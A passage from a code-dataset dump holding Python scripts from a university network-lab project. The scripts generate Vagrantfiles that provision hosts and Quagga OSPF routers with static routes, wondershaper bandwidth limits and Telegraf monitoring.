"text": "import ipcalc \nimport codecs\nimport yaml\n\n#this function writes the beginning of the VagrantFile\ndef BeginVagrantFile(f):\n\n f.write(\"# -*- mode: ruby -*- \\n# vi: set ft=ruby :\\n\\n\")\n f.write(\"#All Vagrant configuration is done below. The 2 in Vagrant.configure\\n#configures the configuration version we support older styles for\\n#backwards compatibility. Please don't change it unless you know what\\n#you're doing.\\n\")\n f.write(\"Vagrant.configure(\\\"2\\\") do |config|\\n\")\n f.write(\"config.vm.box_check_update = true\\n\")\n f.write(\"config.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--usb\\\", \\\"on\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--usbehci\\\", \\\"off\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc2\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc3\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc4\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc5\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.cpus = 1\\n\")\n f.write(\"end\\n\")\n\n\n#this function write in the vagrant file a new PC host\ndef writeHost(f,Host, edges):\n\n Id = Host[\"id\"]\n Name = Host[\"label\"]\n Os = Host[\"vm_image\"]\n Ram = Host[\"ram\"]\n N_Cpus = Host[\"n_cpus\"]\n Ip = Host[\"network_interfaces\"][0][\"ip_address\"]\n Netmask = Host[\"network_interfaces\"][0][\"netmask\"]\n Interface = Host[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference = Host[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth = 0\n DownlinkBandwidth = 0\n for edge in edges:\n if EdgeReference[0] == edge[\"from\"] and EdgeReference[1] == edge[\"to\"]:\n UplinkBandwidth = edge[\"bandwidth_up\"]\n DownlinkBandwidth = edge[\"bandwidth_down\"]\n\n IpNoSub = Ip.split(\"/\")[0]\n Network = ipcalc.Network(Ip)\n IpNet = Network.network()\n\n CustumScript = Host[\"custom_script\"]\n\n for x in Network:\n Gateway = str(x)\n\n f.write(\"config.vm.define \\\"\" + Name + \"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os + \"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\" + Name + \"\\\"\\n\")\n\n if Id == 4:\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub +\"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_router-south-1\\\", auto_config: true\\n\")\n if Id == 5:\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub +\"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_router-south-2\\\", auto_config: true\\n\")\n if Id == 6:\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub +\"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_router-south-3\\\", auto_config: true\\n\")\n \n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"Static Routig configuration Started for \" + Name + \"\\\"\\n\")\n f.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n f.write(\"sudo route add -net \" + str(IpNet) + \" netmask \" + Netmask + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n f.write('cd wondershaper\\n')\n if UplinkBandwidth > 0 or DownlinkBandwidth > 0:\n f.write('sudo ./wondershaper -a ' + Interface)\n if DownlinkBandwidth > 0:\n f.write(' -d ' + str(DownlinkBandwidth))\n if UplinkBandwidth > 0:\n f.write(' -u ' + str(UplinkBandwidth))\n f.write('\\n')\n f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n f.write('sudo systemctl restart telegraf\\n')\n f.write('sudo systemctl enable telegraf\\n')\n f.write(CustumScript + \" \\n\")#here there is the custum script\n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\" + Name + \" is ready to Use\\\"\\n\")\n\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.memory = \" + str(Ram) + \"\\n\")\n f.write(\"vb.cpus = \" + str(N_Cpus) + \"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n\n\n\n\n#this function write in the vagrant file a new Router\ndef writeRouter(f,Router, edges):\n\n Id = Router[\"id\"]\n Name = Router[\"label\"]\n Os = Router[\"vm_image\"]\n Ram = Router[\"ram\"]\n N_Cpus = Router[\"n_cpus\"]\n\n Ip1 = Router[\"network_interfaces\"][0][\"ip_address\"]\n Netmask1 = Router[\"network_interfaces\"][0][\"netmask\"]\n Interface1 = Router[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference1 = Router[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth1 = 0\n DownlinkBandwidth1 = 0\n for edge in edges:\n if EdgeReference1[0] == edge[\"from\"] and EdgeReference1[1] == edge[\"to\"]:\n UplinkBandwidth1 = edge[\"bandwidth_up\"]\n DownlinkBandwidth1 = edge[\"bandwidth_down\"]\n IpNoSub1 = Ip1.split(\"/\")[0]\n NetmaskAbbr1 = Ip1.split(\"/\")[1]\n\n Ip2 = Router[\"network_interfaces\"][1][\"ip_address\"]\n Netmask2 = Router[\"network_interfaces\"][1][\"netmask\"]\n Interface2 = Router[\"network_interfaces\"][1][\"name_interface\"]\n EdgeReference2 = Router[\"network_interfaces\"][1][\"edge\"]\n UplinkBandwidth2 = 0\n DownlinkBandwidth2 = 0\n for edge in edges:\n if EdgeReference2[0] == edge[\"from\"] and EdgeReference2[1] == edge[\"to\"]:\n UplinkBandwidth2 = edge[\"bandwidth_up\"]\n DownlinkBandwidth2 = edge[\"bandwidth_down\"]\n IpNoSub2 = Ip2.split(\"/\")[0]\n NetmaskAbbr2 = Ip2.split(\"/\")[1]\n\n Ip3 = Router[\"network_interfaces\"][2][\"ip_address\"]\n Netmask3 = Router[\"network_interfaces\"][2][\"netmask\"]\n Interface3 = Router[\"network_interfaces\"][2][\"name_interface\"]\n EdgeReference3 = Router[\"network_interfaces\"][2][\"edge\"]\n UplinkBandwidth3 = 0\n DownlinkBandwidth3 = 0\n for edge in edges:\n if EdgeReference3[0] == edge[\"from\"] and EdgeReference3[1] == edge[\"to\"]:\n UplinkBandwidth3 = edge[\"bandwidth_up\"]\n DownlinkBandwidth3 = edge[\"bandwidth_down\"]\n IpNoSub3 = Ip3.split(\"/\")[0]\n NetmaskAbbr3 = Ip3.split(\"/\")[1]\n \n Network1 = ipcalc.Network(Ip1)\n IpNet1 = Network1.network()\n for x in Network1:\n Gateway1 = str(x)\n\n Network2 = ipcalc.Network(Ip2)\n IpNet2 = Network2.network()\n for x in Network2:\n Gateway2 = str(x)\n\n Network3 = ipcalc.Network(Ip3)\n IpNet3 = Network3.network()\n for x in Network3:\n Gateway3 = str(x) \n\n CustomScript = Router[\"custom_script\"] \n\n f.write(\"config.vm.define \\\"\"+ Name +\"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os + \"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\"+ Name +\"\\\"\\n\")\n\n if Id == 1:\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-south-1\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-1\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-3\\\", auto_config: false\\n\")\n if Id == 2:\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-south-2\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-2\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-1\\\", auto_config: false\\n\")\n if Id == 3:\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-south-3\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-3\\\", auto_config: false\\n\")\n f.write(Name + \".vm.network \\\"private_network\\\", virtualbox__intnet: \\\"broadcast_router-inter-2\\\", auto_config: false\\n\") \n\n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + \".vm.provision \\\"shell\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\" Quagga \"+ Name +\" start installing\\\"\\n\")\n f.write(\"#sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n f.write(\"sudo apt-get update\\n\")\n f.write(\"sudo apt-get install quagga quagga-doc traceroute\\n\")\n f.write(\"sudo cp /usr/share/doc/quagga/examples/zebra.conf.sample /etc/quagga/zebra.conf\\n\")\n f.write(\"sudo cp /usr/share/doc/quagga/examples/ospfd.conf.sample /etc/quagga/ospfd.conf\\n\")\n f.write(\"sudo chown quagga.quaggavty /etc/quagga/*.conf\\n\")\n f.write(\"sudo /etc/init.d/quagga start\\n\")\n f.write(\"sudo sed -i s'/zebra=no/zebra=yes/' /etc/quagga/daemons\\n\")\n f.write(\"sudo sed -i s'/ospfd=no/ospfd=yes/' /etc/quagga/daemons\\n\")\n f.write(\"sudo echo 'VTYSH_PAGER=more' >>/etc/environment\\n\")\n f.write(\"sudo echo 'export VTYSH_PAGER=more' >>/etc/bash.bashrc\\n\")\n f.write(\"sudo /etc/init.d/quagga restart\\n\")\n f.write(\"echo \\\"Routing Protocol ospf Configuration Started\\\"\\n\")\n f.write(\"sudo vtysh -c '\\n\")\n f.write(\"configure terminal\\n\")\n f.write(\"router ospf\\n\")\n f.write(\"network \" + str(IpNet1) + \"/\" + NetmaskAbbr1 + \" area 0.0.0.0\\n\")\n f.write(\"network \" + str(IpNet2) + \"/\" + NetmaskAbbr2 + \" area 0.0.0.0\\n\") \n f.write(\"network \" + str(IpNet3) + \"/\" + NetmaskAbbr3 + \" area 0.0.0.0\\n\") \n f.write(\"exit\\n\")\n f.write(\"interface \" + Interface1 + \"\\n\")\n f.write(\"ip address \" + IpNoSub1 + \"/\" + NetmaskAbbr1 + \"\\n\")\n f.write(\"exit\\n\")\n f.write(\"interface \" + Interface2 + \"\\n\")\n f.write(\"ip address \" + IpNoSub2 + \"/\" + NetmaskAbbr2 + \"\\n\")\n f.write(\"exit\\n\")\n f.write(\"interface \" + Interface3 + \"\\n\")\n f.write(\"ip address \" + IpNoSub3 + \"/\" + NetmaskAbbr3 + \"\\n\")\n f.write(\"do write\\n\")\n f.write(\"exit\\n\")\n f.write(\"exit\\n\")\n f.write(\"ip forwarding\\n\")\n f.write(\"exit'\\n\")\n\n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n f.write('cd wondershaper\\n')\n if UplinkBandwidth1 > 0 or DownlinkBandwidth1 > 0:\n f.write('sudo ./wondershaper -a ' + Interface1)\n if DownlinkBandwidth1 > 0:\n f.write(' -d ' + str(DownlinkBandwidth1))\n if UplinkBandwidth1 > 0:\n f.write(' -u ' + str(UplinkBandwidth1))\n f.write('\\n')\n\n if UplinkBandwidth2 > 0 or DownlinkBandwidth2 > 0:\n f.write('sudo ./wondershaper -a ' + Interface2)\n if DownlinkBandwidth2 > 0:\n f.write(' -d ' + str(DownlinkBandwidth2))\n if UplinkBandwidth2 > 0:\n f.write(' -u ' + str(UplinkBandwidth2))\n f.write('\\n')\n \n if UplinkBandwidth3 > 0 or DownlinkBandwidth3 > 0:\n f.write('sudo ./wondershaper -a ' + Interface3)\n if DownlinkBandwidth3 > 0:\n f.write(' -d ' + str(DownlinkBandwidth3))\n if UplinkBandwidth3 > 0:\n f.write(' -u ' + str(UplinkBandwidth3))\n f.write('\\n')\n f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n f.write('sudo systemctl restart telegraf\\n')\n f.write('sudo systemctl enable telegraf\\n')\n f.write(CustomScript + \" \\n\") #here there is the custum script\n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\" + Name + \" is ready to Use\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(\"# \" + Name + \".vm.provision \\\"shell\\\", path: \\\"common.sh\\\"\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.memory = \" + str(Ram) + \"\\n\")\n f.write(\"vb.cpus = \" + str(N_Cpus) + \"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n\n\n\n\"\"\"\n#the following is a fake graph that i used for testing\n#instead of typing everytime the input in the command line\nhost1 = (4,{\n \"Id\" : 4,\n \"Name\":\"host1\",\n \"Type\": \"Host\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"192.168.1.1/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n }]\n})\nhost2 = (5,{\n \"Id\" : 5,\n \"Name\":\"host2\",\n \"Type\": \"Host\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"192.168.2.1/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n }]\n})\nhost3 = (6,{\n \"Id\" : 6,\n \"Name\":\"host3\",\n \"Type\": \"Host\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"192.168.3.1/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n }]\n})\n\nrout1 = (1,{\n \"Id\" : 1,\n \"Name\":\"router1\",\n \"Type\": \"Router\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\": \"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"192.168.1.254/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n },{\n \"Ip\": \"192.168.100.1/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth2\"\n },{\n \"Ip\": \"192.168.101.2/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth3\"\n }]\n})\nrout2 = (2,{\n \"Id\" : 2,\n \"Name\":\"router2\",\n \"Type\": \"Router\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\": \"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"192.168.2.254/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n },{\n \"Ip\": \"192.168.100.2/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth2\"\n },{\n \"Ip\": \"192.168.102.2/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth3\"\n }]\n})\nrout3 = (3,{\n \"Id\" : 3,\n \"Name\":\"ruoter3\",\n \"Type\": \"Router\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\": \"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"192.168.3.254/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n },{\n \"Ip\": \"192.168.101.1/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth2\"\n },{\n \"Ip\": \"192.168.102.1/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth3\"\n }]\n})\n\nMyNet = [host1,host2,host3,rout1,rout2,rout3]\n\ndef remap(newList):\n print(\"-------------------\")\n\n for item in newList:\n print(\"Looking at device \" + str(item))\n print(\"the TYPE is \" + item[\"type\"])\n if item[\"type\"] == \"router\" : \n\n for device in MyNet:\n if device[1][\"Id\"] is item[\"id\"]:\n print(\"remap of device \" + str(device[1][\"Id\"]) + \" to device \" + str(item[\"id\"]))\n device[1][\"Name\"] = item[\"label\"]\n device[1][\"Ram\"] = item[\"ram\"]\n device[1][\"Os\"] = item[\"vm_image\"]\n\n device[1][\"Network\"][0][\"Ip\"] = item[\"network_interfaces\"][0][\"ip_address\"]\n device[1][\"Network\"][0][\"Netmask\"] = item[\"network_interfaces\"][0][\"netmask\"]\n device[1][\"Network\"][0][\"Interface\"] = item[\"network_interfaces\"][0][\"name_interface\"]\n\n device[1][\"Network\"][1][\"Ip\"] = item[\"network_interfaces\"][1][\"ip_address\"]\n device[1][\"Network\"][1][\"Netmask\"] = item[\"network_interfaces\"][1][\"netmask\"]\n device[1][\"Network\"][1][\"Interface\"] = item[\"network_interfaces\"][1][\"name_interface\"]\n\n device[1][\"Network\"][2][\"Ip\"] = item[\"network_interfaces\"][2][\"ip_address\"]\n device[1][\"Network\"][2][\"Netmask\"] = item[\"network_interfaces\"][2][\"netmask\"]\n device[1][\"Network\"][2][\"Interface\"] = item[\"network_interfaces\"][2][\"name_interface\"] \n\n for item in newList:\n if item[\"type\"] == \"host\" : \n\n for device in MyNet:\n if device[1][\"Id\"] is item[\"id\"]:\n print(\"remap of device \" + str(device[1][\"Id\"]) + \" to device \" + str(item[\"id\"]))\n device[1][\"Name\"] = item[\"label\"]\n device[1][\"Ram\"] = item[\"ram\"]\n device[1][\"Os\"] = item[\"vm_image\"]\n\n device[1][\"Network\"][0][\"Ip\"] = item[\"network_interfaces\"][0][\"ip_address\"]\n device[1][\"Network\"][0][\"Netmask\"] = item[\"network_interfaces\"][0][\"netmask\"]\n device[1][\"Network\"][0][\"Interface\"] = item[\"network_interfaces\"][0][\"name_interface\"]\n\n return MyNet\n\"\"\"\n\ndef html_to_vagrantfile(nodes, edges):\n VagrantFile = open(\"Vagrantfile\", \"w\")\n\n BeginVagrantFile(VagrantFile)\n for node in nodes:\n if node[\"type\"] == \"router\":\n writeRouter(VagrantFile, node, edges)\n if node[\"type\"] == \"host\":\n writeHost(VagrantFile, node, edges) \n\n VagrantFile.write(\"end\\n\")\n VagrantFile.close()\n\n #read the data structure from input\n #Network = G.nodes.data():\n #file = codecs.open(network_path, \"r\", \"utf-8\")\n #html = file.read()\n\n #if \"nodes = new vis.DataSet(\" in html:\n #listOfDevice = find_between(html, \"nodes = new vis.DataSet(\" , \")\")\n #print(listOfDevice)\n #listOfDevice = yaml.load(listOfDevice) \n\n\n #Network = remap(listOfDevice)\n #Network = listOfDevice\n #N.B per Luca, Network è già la lista dei nodi che puoi esplorare\n\n #first, let's write the beginnig of the VagrantFile\n\n #second, let's write each device with his feature\n #this topology has 3 hosts and 3 routers\n #call the respective function to \"populate\" the vagrant file\n\n #BeginVagrantFile(VagrantFile)\n\n #for device in Network: \n # typeOfDevice = device[1][\"Type\"]\n #print(\"the device is a \" + typeOfDevice)\n\n # if typeOfDevice is \"Router\":\n # writeRouter(VagrantFile,device)\n\n\n #for device in Network:\n # typeOfDevice = device[1][\"Type\"]\n #print(\"the device is a \" + typeOfDevice)\n\n # if typeOfDevice is \"Host\":\n # writeHost(VagrantFile,device)\n\n\n\n"
},
{
"alpha_fraction": 0.5724530816078186,
"alphanum_fraction": 0.6066775321960449,
"avg_line_length": 39.47903060913086,
"blob_id": "b841c81f6d48742679f9fc89d39908a33a81c993",
"content_id": "4cbb07b1d8a6e49f3e91d5c815b3b32a02de2a6b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 25101,
"license_type": "permissive",
"max_line_length": 239,
"num_lines": 620,
"path": "/fromHTMLtoVagrant/VagrantTopologySwitch.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "import ipcalc \n\n#this function writes the beginning of the VagrantFile\ndef BeginVagrantFile(f):\n print(\"writing the beginning of the vagrant file\")\n f.write(\"# -*- mode: ruby -*- \\n# vi: set ft=ruby :\\n\\n\")\n f.write(\"#All Vagrant configuration is done below. The 2 in Vagrant.configure\\n#configures the configuration version we support older styles for\\n#backwards compatibility. Please don't change it unless you know what\\n#you're doing.\\n\")\n f.write(\"Vagrant.configure(\\\"2\\\") do |config|\\n\")\n f.write(\"config.vm.box_check_update = true\\n\")\n f.write(\"config.vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--usb\\\", \\\"on\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--usbehci\\\", \\\"off\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc2\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc3\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc4\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.customize [\\\"modifyvm\\\", :id, \\\"--nicpromisc5\\\", \\\"allow-all\\\"]\\n\")\n f.write(\"vb.cpus = 1\\n\")\n f.write(\"end\\n\")\n\n\n#this function write in the vagrant file a new PC host\ndef writeHost(f, Host, edges, network):\n\n Id = Host[\"id\"]\n Name = Host[\"label\"]\n Os = Host[\"vm_image\"]\n Ram = Host[\"ram\"]\n N_Cpus = Host[\"n_cpus\"]\n CustumScript = Host[\"custom_script\"]\n Ip = Host[\"network_interfaces\"][0][\"ip_address\"]\n Netmask = Host[\"network_interfaces\"][0][\"netmask\"]\n Interface = Host[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference = Host[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth = 0\n DownlinkBandwidth = 0\n for edge in edges:\n if EdgeReference[0] == edge[\"from\"] and EdgeReference[1] == edge[\"to\"]:\n UplinkBandwidth = edge[\"bandwidth_up\"]\n DownlinkBandwidth = edge[\"bandwidth_down\"]\n IpNoSub = Ip.split(\"/\")[0]\n Network = ipcalc.Network(Ip)\n IpNet = Network.network()\n\n\n IpRouter2 = network[1][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskRouter2 = network[1][\"network_interfaces\"][0][\"netmask\"]\n NetworkRouter2 = ipcalc.Network(IpRouter2)\n IpNetRouter2 = str(NetworkRouter2.network())\n \"\"\"\n Ip2 = Topology[4][1][\"Network\"][0][\"Ip\"]\n Mask2 = Topology[4][1][\"Network\"][0][\"Netmask\"]\n Network2 = ipcalc.Network(Ip2)\n IpNet2 = str(Network2.network())\n \"\"\"\n\n IpRouter1_1 = network[0][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskRouter1_1 = network[0][\"network_interfaces\"][0][\"netmask\"]\n NetworkRouter1_1 = ipcalc.Network(IpRouter1_1)\n IpNetRouter1_1 = str(NetworkRouter1_1.network())\n \"\"\"\n Ip3 = Topology[3][1][\"Network\"][0][\"Ip\"]\n Mask3 = Topology[3][1][\"Network\"][0][\"Netmask\"]\n Network3 = ipcalc.Network(Ip3)\n IpNet3 = str(Network3.network())\n \"\"\"\n\n IpRouter1_2 = network[0][\"network_interfaces\"][1][\"ip_address\"]\n NetmaskRouter1_2 = network[0][\"network_interfaces\"][1][\"netmask\"]\n NetworkRouter1_2 = ipcalc.Network(IpRouter1_2)\n IpNetRouter1_2 = str(NetworkRouter1_2.network())\n \"\"\"\n Ip4 = Topology[3][1][\"Network\"][1][\"Ip\"]\n Mask4 = Topology[3][1][\"Network\"][1][\"Netmask\"]\n Network4 = ipcalc.Network(Ip4)\n IpNet4 = str(Network4.network())\n \"\"\"\n\n IpSwitch_1 = network[2][\"network_interfaces\"][0][\"ip_address\"]\n NetmaskSwitch_1 = network[2][\"network_interfaces\"][0][\"netmask\"]\n NetworkSwitch_1 = ipcalc.Network(IpSwitch_1)\n IpNetSwitch_1 = str(NetworkSwitch_1.network())\n \"\"\"\n Ip8 = Topology[5][1][\"Network\"][0][\"Ip\"]\n Mask8 = Topology[5][1][\"Network\"][0][\"Netmask\"]\n Network8 = ipcalc.Network(Ip8)\n IpNet8 = str(Network8.network())\n \"\"\"\n\n IpSwitch_2 = network[2][\"network_interfaces\"][1][\"ip_address\"]\n NetmaskSwitch_2 = network[2][\"network_interfaces\"][1][\"netmask\"]\n NetworkSwitch_2 = ipcalc.Network(IpSwitch_2)\n IpNetSwitch_2 = str(NetworkSwitch_2.network())\n \"\"\"\n Ip12 = Topology[5][1][\"Network\"][1][\"Ip\"]\n Mask12 = Topology[5][1][\"Network\"][1][\"Netmask\"]\n Network12 = ipcalc.Network(Ip12)\n IpNet12 = str(Network12.network())\n \"\"\"\n\n if Id == 4:\n Gateway = IpSwitch_1.split(\"/\")[0]\n\n if Id == 5:\n Gateway = IpSwitch_2.split(\"/\")[0]\n\n if Id == 6:\n Gateway = IpRouter2.split(\"/\")[0]\n\n f.write(\"config.vm.define \\\"\" + Name + \"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os +\"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\" + Name + \"\\\"\\n\")\n if Id == 4:\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub + \"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_host_\" + Name + \"\\\", auto_config: true\\n\")\n if Id == 5:\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub + \"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_host_\" + Name + \"\\\", auto_config: true\\n\")\n if Id == 6:\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub + \"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_router-south-2\\\", auto_config: true\\n\") \n \n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"Static Routig configuration Started for \" + Name + \"\\\"\\n\")\n f.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n\n f.write(\"sudo route add -net \" + IpNetRouter2 + \" netmask \" + NetmaskRouter2 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetRouter1_1 + \" netmask \" + NetmaskRouter1_1 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetRouter1_2 + \" netmask \" + NetmaskRouter1_2 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\") \n\n if Id == 4: \n f.write(\"sudo route add -net \"+ IpNetSwitch_2 + \" netmask \" + NetmaskSwitch_2 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n if Id == 5:\n f.write(\"sudo route add -net \" + IpNetSwitch_1 + \" netmask \" + NetmaskSwitch_1 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n if Id == 6: \n f.write(\"sudo route add -net \" + IpNetSwitch_1 + \" netmask \" + NetmaskSwitch_1 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write(\"sudo route add -net \" + IpNetSwitch_2 + \" netmask \" + NetmaskSwitch_2 + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n \n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n f.write('cd wondershaper\\n')\n if UplinkBandwidth > 0 or DownlinkBandwidth > 0:\n f.write('sudo ./wondershaper -a ' + Interface)\n if DownlinkBandwidth > 0:\n f.write(' -d ' + str(DownlinkBandwidth))\n if UplinkBandwidth > 0:\n f.write(' -u ' + str(UplinkBandwidth))\n f.write('\\n')\n f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n f.write('sudo systemctl restart telegraf\\n')\n f.write('sudo systemctl enable telegraf\\n')\n f.write(CustumScript + \" \\n\") #here there is the custum script\n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo 